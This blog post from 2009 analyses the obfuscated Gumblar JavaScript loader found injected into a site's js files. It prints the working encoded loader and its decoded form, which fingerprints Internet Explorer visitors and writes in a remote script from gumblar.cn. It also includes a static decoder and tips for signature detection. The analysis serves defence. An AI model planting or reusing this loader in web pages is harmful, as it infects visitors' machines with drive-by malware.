07 May 2009

Malware Javascript

One of the biggest online advertisement contest web sites uses a kind of web 2.0 JavaScript pack. I have found malicious JavaScript code at the end of all of the included js files. Here is the code; let's start the analysis.

(function(){var smtbX='>76>61r>20a>3d>22Scri>70tEngi>6ee>22>2c>62>3d>22Versi>6f>6e()>22>2cj>3d>22>22>2c>75>3d>6eaviga>74>6fr>2eus>65>72>41g>65nt>3bi>66>28(>75>2e>69ndexOf(>22Win>22)>3e0)>26>26(u>2ein>64ex>4ff(>22NT>20>36>22)>3c0)>26>26(do>63ument>2ec>6fokie>2ein>64>65x>4ff(>22miek>3d1>22)>3c0)>26>26(typ>65>6f>66>28zr>76zts)>21>3dty>70eo>66(>22A>22)))>7bzrv>7ats>3d>22A>22>3b>65>76>61>6c(>22>69f(win>64ow>2e>22+a+>22>29j>3dj+>22>2ba>2b>22M>61jor>22>2bb+a+>22Minor>22+b+a+>22>42ui>6c>64>22>2bb+>22>6a>3b>22)>3bdocument>2e>77rite(>22>3cscri>70>74>20sr>63>3d>2f>2fgu>6dblar>2ecn>2frss>2f>3f>69>64>3d>22>2bj>2b>22>3e>3c>5c>2f>73c>72ipt>3e>22)>3b>7d';var ujt2o=unescape(smtbX.replace(/>/g,'%'));eval(ujt2o)})();

The code ends with a replace call that swaps every ">" for "%" (the trailing "g" is only the regex's global flag), so I applied that replacement and then URL-decoded the result =>

(function(){var smtbX='var a="ScriptEngine",b="Version()",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}';var ujt2o=unescape(smtbX.replace(/%/g,'%'));eval(ujt2o)})();

The malicious code makes a request to gumblar.cn/rss/?id= followed by the value of j (built from the ScriptEngine version numbers, so only Internet Explorer on Windows before NT 6 is targeted). I have tried this site with a standard Windows XP system without any protection, and it exploited my PDF viewer and then tried to download some malware files. In my opinion this code belongs to a virus payload. Somehow this virus infected the web server, found the js files and added its payload to them.
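The two decoding steps described above, reversed statically so the sample never reaches eval(), as an added example that is not code from the original post: ENCODED_SAMPLE is the smtbX value quoted above, decodePercentEscapes reimplements the legacy unescape() behaviour, and the function names (decodeLoaderPayload, extractInjectedScriptSrc, hostOf) are my own.

```javascript
// Added example: static reversal of the loader's two decoding steps. The encoded
// string is the smtbX value from the infected files quoted in this post; nothing
// here is eval()ed, so the sample can be decoded safely on an analysis box.
const ENCODED_SAMPLE = ">76>61r>20a>3d>22Scri>70tEngi>6ee>22>2c>62>3d>22Versi>6f>6e()>22>2cj>3d>22>22>2c>75>3d>6eaviga>74>6fr>2eus>65>72>41g>65nt>3bi>66>28(>75>2e>69ndexOf(>22Win>22)>3e0)>26>26(u>2ein>64ex>4ff(>22NT>20>36>22)>3c0)>26>26(do>63ument>2ec>6fokie>2ein>64>65x>4ff(>22miek>3d1>22)>3c0)>26>26(typ>65>6f>66>28zr>76zts)>21>3dty>70eo>66(>22A>22)))>7bzrv>7ats>3d>22A>22>3b>65>76>61>6c(>22>69f(win>64ow>2e>22+a+>22>29j>3dj+>22>2ba>2b>22M>61jor>22>2bb+a+>22Minor>22+b+a+>22>42ui>6c>64>22>2bb+>22>6a>3b>22)>3bdocument>2e>77rite(>22>3cscri>70>74>20sr>63>3d>2f>2fgu>6dblar>2ecn>2frss>2f>3f>69>64>3d>22>2bj>2b>22>3e>3c>5c>2f>73c>72ipt>3e>22)>3b>7d";

// Legacy unescape(): %XX -> one character, %uXXXX -> one UTF-16 unit, and any
// malformed sequence is left untouched (unescape never throws, unlike decodeURIComponent).
function decodePercentEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (match, u, x) => String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Step 1: the loader's replace(/>/g,'%') turns the custom separator back into '%'.
// Step 2: unescape() turns the %XX escapes into characters.
function decodeLoaderPayload(encoded, separator = ">") {
  return decodePercentEscapes(encoded.split(separator).join("%"));
}

// The payload injects a remote script via document.write("<script src=...>");
// pull that URL out so it can go on a blocklist or into a proxy log search.
function extractInjectedScriptSrc(decoded) {
  const found = decoded.match(/<script\s+src=([^"'\s>]+)/i);
  return found ? found[1] : null;
}

// Reduce a (protocol-relative) src to its host name.
function hostOf(src) {
  return src ? src.replace(/^(https?:)?\/\//, "").split("/")[0] : null;
}

const decoded = decodeLoaderPayload(ENCODED_SAMPLE);
console.log(decoded);
console.log("remote script:", extractInjectedScriptSrc(decoded));
console.log("host to block:", hostOf(extractInjectedScriptSrc(decoded)));
```

Run it with node; the decoded text printed first is the same payload shown above, and the last two lines give the value you would feed to a web filter or DNS blocklist.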

The "replace" function in JavaScript may be part of a malicious script. Websense and other web filter tools' crawlers parse these js files and do a signature-based search for malicious patterns. If you want to do it yourself, mirroring the site and searching the files for such strings also works.
